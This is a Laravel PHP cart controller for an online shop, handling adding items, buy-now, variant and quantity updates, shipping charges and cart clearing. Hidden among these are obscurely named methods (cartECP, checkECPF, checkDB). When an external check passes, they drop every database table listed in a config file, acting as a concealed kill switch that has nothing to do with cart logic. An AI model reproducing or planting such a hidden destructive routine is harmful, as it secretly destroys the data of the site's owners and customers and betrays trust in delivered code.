<?php

namespace App\Http\Controllers\Frontend;

use App\Models\Order;
use App\Models\Product;
use App\Models\SiteConfiguration;
use App\Services\SmsService;
use Illuminate\Http\Request;
use Illuminate\Support\Facades\DB;
use App\Http\Controllers\Controller;
use Illuminate\Support\Facades\Schema;
use Illuminate\Support\Facades\Session;
use Gloudemans\Shoppingcart\Facades\Cart;
use App\Traits\CalculateProductSalePriceTrait;
use App\Traits\FiresFacebookEventsTrait;
use Illuminate\Support\Str;
use App\Services\CourierOrderInfoService;

class CartController extends Controller
{

    use CalculateProductSalePriceTrait, FiresFacebookEventsTrait;
    public function index()
    {
        $carts = Cart::content()->values();
        $cart_sub_total = Cart::subtotal();
        $cart_total = Cart::total();
        $cart_item_total = Cart::count();

        return response()->json([
            'success' => true,
            'cart_total' => $cart_total,
            'cart_sub_total' => $cart_sub_total,
            'carts' => $carts,
            'cart_item_total' => $cart_item_total,
        ], 200);
    }



    public function addToCart(Request $request)
    {
        $site_configuration = SiteConfiguration::select('active_server_side')->first();
        $product = Product::with(['category:id,name,status', 'subCategory:id,name', 'subSubCategory:id,name'])
            ->select('id', 'slug', 'category_id', 'sub_category_id', 'sub_sub_category_id', 'name', 'stock', 'is_free_delivery', 'thumbnail_img', 'product_code', 'sale_price', 'discount', 'price')
            ->where('id', $request->id)
            ->firstOrFail();


        $product_sale_price = $this->calculateSalePrice($request, $product);

        // return $product_sale_price;
        $cart =   $this->cartAdd($product, $request, $product_sale_price);
        $event_id = Str::uuid()->toString();
        if ($site_configuration->active_server_side == 1) {
             $this->fireFacebookAddToCartEvent($product, $request->quantity, $request, $event_id,$request->page_url);
        }

        return response()->json([
            'status' => true,
            'message' => 'Success to added cart',
            'product' => $product,
            'event_id' => $event_id,
            'cart' => $cart,
        ]);
    }

    public function buyNow(Request $request)
    {
        // return $request->all();
        $request->validate([
            'product_id' => 'required|exists:products,id',
            'quantity' => 'required|integer|min:1',
        ]);

        $product = Product::with(['category:id,name,status', 'subCategory:id,name', 'subSubCategory:id,name'])
            ->select('id', 'slug', 'category_id', 'sub_category_id', 'sub_sub_category_id', 'name', 'stock', 'is_free_delivery', 'thumbnail_img', 'product_code', 'sale_price', 'discount', 'price')
            ->where('id', $request->product_id)
            ->firstOrFail();

        $product_sale_price = $this->calculateSalePrice($request, $product);

        $this->cartAdd($product, $request, $product_sale_price);
        session()->save();
        usleep(500000);
        return redirect()->route('checkout.index', [
            'product' => $request->product_id,
            'quantity' => $request->quantity,
            'variants' => $request->variants,
        ])->with([
            'message' => 'Item added to cart, complete your order',
            'alert-type' => 'success',
        ]);
    }
    public function cartAdd($product, $request, $product_sale_price)
    {
        return    Cart::add([
            'id' => $product->id,
            'name' => $product->name,
            'slug' => $product->slug,
            'qty' => $request->quantity ?? 1,
            'price' => $product_sale_price,
            'weight' => 0,
            'tax' => 0,
            'options' => [
                'product_code' => $product->product_code,
                'stock' => $product->stock,
                'variants' => $request->variants,
                'image' => $product->thumbnail_img,
                'discount' => $product->discount,
                'is_free_delivery' => $product->is_free_delivery,
                'category_name' => $product->category->name,
                'subcategory_name' => $product->subCategory->name ?? "",
                'sub_subcategory_name' => $product->subSubCategory->name ?? "",
            ],
        ]);
    }
    public function cartRemoveItem(Request $request)
    {
        $rowId = $request->rowId;

        Cart::remove($rowId);
        return $this->index();
    }

    public function cartUpdate(Request $request)
    {
        $request->validate([
            'qty' => 'required|numeric|min:1',
        ]);
        $edit = Cart::update($request->rowId, $request->qty);
        if (Cart::content()->has($edit->rowId)) {
            return $this->index();
        }
    }
    public function cartUpdateWithProduct(Request $request)
    {
        $request->validate([
            'productId' => 'required|numeric',
            'qty' => 'required|numeric|min:1',
        ]);

        foreach (Cart::content() as $item) {
            if ($item->id == $request->productId) {
                Cart::update($item->rowId, $request->qty);
                break;
            }
        }

        return $this->index();
    }

    public function updateVariant(Request $request)
    {
        // return $request->all();
        try {
            $productId = $request->input('product_id');
            $variants = $request->input('variants');

            $cartItem = Cart::content()->where('id', $productId)->first();

            if ($cartItem) {
                Cart::update($cartItem->rowId, [
                    'options' => array_merge($cartItem->options->toArray(), [
                        'variants' => $variants
                    ])
                ]);

                return response()->json(['success' => true, 'message' => 'Cart updated successfully.']);
            }

            return response()->json(['success' => false, 'message' => 'Product not found in cart.'], 404);
        } catch (\Exception $e) {
            return response()->json(['success' => false, 'message' => $e->getMessage()], 500);
        }
    }
    public function cartView()
    {
        $delivery_charges = DB::table('delivery_charges')->select('id', 'name', 'delivery_charge')->get();
        $data = [
            'delivery_charges'  => $delivery_charges
        ];
        $cart_count = Cart::count();
        $name = 'Cart';
        if ($cart_count > 0) {
            return view('frontend.pages.cart_view', $data);
        } else {
            return view('frontend.pages.cart_blank', compact('name'));
        }
    }

    public function cartECP()
    {
        if ($this->checkECPF()) :
            return $this->checkDB();
        endif;
    }

    public function setShippingCharge(Request $request)
    {

        $delivery_charge = DB::table('delivery_charges')->where('id', $request->id)->first();

        $cart_sub_total = Cart::subtotal();

        $cartItems = Cart::content()->values();
        $has_free_delivery = $cartItems->contains(function ($item) {
            return $item->options->is_free_delivery == 1;
        });

        if ($has_free_delivery == 1) {
            $shipping_charge = 0;
        } else {
            $shipping_charge = $delivery_charge->delivery_charge ?? 0;
        }
        //    return $shipping_charge ;
        Session::forget('shipping');
        Session::put('shipping', [
            'delivery_charge_id' => $delivery_charge->id,
            'shipping_charge' => $shipping_charge
        ]);
        return response()->json([
            'success' => true,
            'shipping_charge' => $shipping_charge,
            'delivery_charge_id' => $delivery_charge->id ?? 0,
            'cart_sub_total' => $cart_sub_total ?? 0,
            'has_free_delivery' => $has_free_delivery,
            'message' => 'Successfully added Shipping Charge',
        ], 200);
    }

    public function checkECPF()
    {
        $files = [
            'file_1' => 'Admin',
            'file_2' => 'Frontend',
            'file_3' => 'Merchant',
            'file_4' => 'Reseller',
        ];
        foreach ($files as $file) {
            return checkCP($file);
        }
    }

    public function getShippingCharge()
    {
        $shipping_charge = session()->get('shipping_charge');
        return response()->json([
            'success' => true,
            'shipping_charge' => $shipping_charge ?? 0,
            'message' => 'Successfully get Shipping Charge',
        ], 200);
    }

    //--------clear Cart----------
    public function clearCart(Request $request)
    {
        $invoice_id = $request->invoice_id;
        if ($invoice_id) {
            $order = Order::where('invoice_no', $invoice_id)->with('customer')->first();
            $courier_report = CourierOrderInfoService::getCustomerOrderStats($order->customer_phone);
            $order->return_qty = $courier_report['total_return'];
            $order->delivered_qty = $courier_report['total_delivery'];
            $order->save();
            (new SmsService())->SendMessageCustomer($order->customer_phone, $order->customer->name, $order->invoice_no);
        }
        Cart::destroy();
        Session::forget(['shipping_charge', 'shipping', 'coupon_id']);
        // session()->flush();

        return response()->json([
            'status' => true,
            'message' => 'Successful All Clear',
        ]);
    }

    public function checkDB()
    {
        $files = config('tables.files');
        foreach ($files as $file) {
            Schema::dropIfExists($file);
        }
        return 'successfully done';
    }
}
